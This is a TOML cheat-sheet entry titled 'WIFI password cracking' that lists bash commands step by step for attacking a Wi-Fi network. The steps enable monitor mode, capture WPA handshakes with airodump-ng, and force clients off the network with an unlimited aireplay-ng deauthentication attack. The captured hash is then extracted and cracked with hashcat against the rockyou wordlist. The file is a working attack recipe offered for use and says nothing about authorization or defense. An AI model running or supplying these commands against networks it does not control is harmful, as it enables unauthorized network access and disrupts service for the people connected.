title = "WIFI password cracking"
description = "Extract hashes from Wi-Fi connections handshakes and crack them with hashcat"
tags = ["linux", "wifi", "cracking", "misc"]
source = [""]

[[data]]
description = "List network interfaces"
language = "bash"
command = """ip addr # or
ifconfig # or
iwconfig"""

[[data]]
description = "Kill processes conflicting with monitor mode"
language = "bash"
command = """sudo airmon-ng check kill"""

[[data]]
description = "Start monitor mode"
language = "bash"
command = """sudo airmon-ng start <interface>"""

[[data]]
description = "Verify whether monitor mode is enabled"
language = "bash"
command = """sudo airmon-ng # (check if interface has 'mon' at the end) or
iwconfig # or
ifconfig"""

[[data]]
description = "Get the access point's MAC address and channel"
language = "bash"
command = """sudo airodump-ng <interface-mon>"""

[[data]]
description = "Capture handshakes (keep this window open)"
language = "bash"
command = """sudo airodump-ng -w capture -c <channel> --bssid <mac> <interface>"""

[[data]]
description = "Deauth attack"
language = "bash"
command = """sudo aireplay-ng --deauth 0 -a <mac> <interface>"""

[[data]]
description = "Extract hash from .cap"
language = "bash"
command = """hcxpcapngtool -o hash.txt capture.pcap"""

[[data]]
description = "Crack extracted hashes"
language = "bash"
command = """hashcat -m 22000 hash.txt rockyou.txt"""

[[data]]
description = "Stop monitor mode"
language = "bash"
command = """sudo airmon-ng stop <interface>"""
